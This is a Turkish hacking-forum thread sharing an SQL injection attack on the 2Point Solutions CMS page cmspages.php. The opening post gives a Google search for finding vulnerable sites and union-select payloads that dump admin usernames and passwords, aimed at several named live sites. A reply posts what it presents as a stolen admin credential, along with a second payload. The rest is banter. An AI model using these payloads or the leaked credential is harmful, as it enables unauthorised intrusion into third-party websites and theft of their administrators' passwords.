

2Point Solutions SQL Injection Açığı (Cmspages.Php)
-
Script Yapımcısı: http://www.2pointsolutions.com/
Açığı rastlayabileceğiniz siteleri şu şekil aratabilirsiniz google amcada : "2point solutions" cmspages.php?id=
cmspages.php dosyasından kaynaklanıyor açık
Sql injeksiyon: http://[hedefsite]/cmspages.php?id=[SQL]
örnek olarak :http://www.cvbf.com/cmspages.php?id=-1+union+select%201,group_concat(FName,
0x3a,password),3+from+admin--
http://www.modularsystems.net/cmspages.php?id=-11+union+select%201,group_co
ncat(FName,0x3a,password),3+from+admin--Gördüğünüz admin şifresi karşınızda
-
up :|
-
2Point Solutions SQL Injection Açığı İstanbulda çıplak pozlar verdi
yazsaydın konu nasıl ilgi görürdü. Eline emeğine sağlık.
-
VBDream bunu yazdı:
-----------------------------
2Point Solutions SQL Injection Açığı İstanbulda çıplak pozlar verdi
yazsaydın konu nasıl ilgi görürdü. Eline emeğine sağlık.
-----------------------------tavan yapardı :| hoca eline sağlık
-
admin şifresinin bumu ?
vanbriggle@2point#:Kabed#321AP
edit:
ayrıca bazılarılarında direkt çalışmıyor.Yani mysq_fetch diyor.Onlara şu kodu yapıştırabilirsiniz ;
-5+union+select+1,PASSWORD,FNAME,4,5,6+from+ADMIN--
örnek : http://ffoc.net/cmspages.php?id=
-
eyv Hocam Baya kolay oluyor. online Char Converter Varmı bildiğiniz şirketteyim Hackbar felan kurmayayım sorun çıkabilir.